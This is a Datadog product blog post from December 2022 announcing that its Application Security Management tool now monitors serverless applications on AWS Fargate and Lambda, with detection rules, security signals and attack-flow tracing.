Secure Serverless Applications With Datadog ASM | Datadog

Secure serverless applications with Datadog ASM

Author Jordan Obey
Author Karishma Asthana
Author Sourabh Katti

Published: December 12, 2022

The popularity of serverless architectures continues to grow as organizations seek ease of scalability and to eliminate the need to provision and manage infrastructure. In fact, in our most recent State of Serverless report, we found that more than half of our customers have adopted serverless technologies offered by Azure, Google Cloud, and AWS.

While serverless architectures have shifted the responsibility of server-side security to trusted cloud providers, teams must still protect against application-level attacks such as Command/SQL injection, Cross Site Scripting (XSS), Denial of Service (DoS), and more. Securing serverless applications is uniquely challenging because they are highly distributed and comprise several ephemeral, stateless components. Functions need to be secured not only at the code level but per invocation as well, which further complicates application security because functions are often invoked millions or billions of times a month. This new attack surface offers more opportunities for attackers to compromise data and exploit vulnerable applications. AWS helped address this newer attack surface by expanding Amazon Inspector to include support for AWS Lambda functions, so you can identify vulnerabilities at the Lambda layer.

To further help overcome challenges to serverless security, Datadog Application Security Management (ASM) now includes support for applications built on AWS Fargate and AWS Lambda serverless technologies. Datadog ASM works alongside Application Performance Monitoring (APM), which means you can monitor traffic for security threats without any additional agents or instrumentation. ASM monitors the traffic of your serverless application to generate Security Signals and provide insight into application-level attacks attempting to exploit code-level vulnerabilities. You can now monitor and manage the security of your applications just as easily as managing their performance and reliability.

In this post, we’ll look at how ASM addresses the challenges of securing serverless architectures by:

Seamlessly enable security monitoring on all of your functions

As serverless applications and APIs grow in size and complexity, more opportunities arise for bad actors to take advantage of their vulnerabilities. Serverless applications often consist of a large number of functions and services, each of which provides a potential entry point for an attack and contributes to a wider overall attack surface. Additionally, Lambda functions can be triggered by several types of events from many different services such as Amazon S3 storage configuration changes, DynamoDB database changes, and Amazon SNS notifications. These factors make it difficult to implement security monitoring because of the large volume of individual functions you need to enable monitoring on—leading to a higher operational overhead.

Datadog ASM uses the same tracing libraries as Datadog APM, which means that if you have already instrumented your service or application with APM, you simply need to update to the most recent APM tracing library and enable ASM to collect application security data. Once enabled, ASM will monitor requests across your Lambda functions and applications hosted on Fargate and automatically detect and notify you of security threats targeting your Fargate tasks and Lambda functions.

Identify damaging serverless exploits and any impacted function or task

Because every invocation of a Lambda function represents an opportunity for a security breach, identifying attacks exploiting Lambda functions requires visibility into each invocation. Without visibility into the full scope of a request, it can be difficult to distinguish between legitimate and malicious traffic, increasing the time it takes to detect an attack and giving an attacker more time to successfully exploit a vulnerability.

Datadog ASM operates at runtime and monitors on an invocation basis. It includes comprehensive out-of-the-box detection rules that automatically flag common security threats and code-level vulnerabilities in your serverless application, such as Log4Shell and Local File Inclusion (LFI) attack attempts. When an attack behavior matches a detection rule, Datadog will generate a Security Signal notifying you of the attack.

Datadog ASM centralizes Security Signals, which provide contextualizing details such as the IP address an attack originated from.

Another challenge to ensuring the security of serverless architectures is the ephemeral nature of Lambda functions and Fargate containers, which autoscale up and down depending on usage. Datadog ASM distributed tracing addresses this challenge by tracing requests as they propagate across your serverless application to help you identify the most urgent attack attempts as they occur. Within ASM, you can pivot from a Security Signal directly to its related traces, letting you immediately investigate the exact Lambda functions or Fargate tasks that were impacted if an attack occurs.

Use deep code-level insight for fast threat remediation

The ephemerality and volume of Lambda functions and Fargate containers also makes it difficult to determine the scope of an attack and how best to approach remediation. For example, you may have been notified of an attack, but without visibility into what other parts of your service were impacted or what code-level vulnerability was exploited, it won’t be clear what next steps to take. Datadog ASM helps speed up the mean time to remediate (MTTR) by pinpointing exactly where the vulnerability exists, the attack’s impact and blast radius, and the overall context around the root cause of the attack—eliminating arduous triage and investigations.

With Datadog ASM Attack Flows, you can see how an attack propagated across functions to understand its blast radius and gain context around how best to remediate. Security Signals provide the exact function where the vulnerability is, the detection rule that was triggered, the malicious input, and advice on how to remediate. In the screenshot below, you can see that an attack was attempted on a Lambda function called ipaddr-local-time and calls for immediate action.

Datadog ASM attack flows enable you to see how attacks propagate across a service.

Secure your serverless applications with Datadog ASM today

Datadog Application Security Management provides insight into application-level attacks throughout your serverless architecture, enabling you to understand an attack’s blast radius and remediate the breach quickly. Currently, ASM’s serverless support is generally available for AWS Fargate, with support for AWS Lambda in private beta. If you are a Datadog APM serverless user, sign up for the private beta for early access to ASM for Lambda.

In addition to ASM, Datadog includes a suite of other security tools to help you improve your security posture, such as Cloud SIEM, Cloud Security Posture Management, and Cloud Workload Security. To learn more about Datadog Security, check out our documentation.

If you aren’t already using Datadog, sign up today for a 14-day .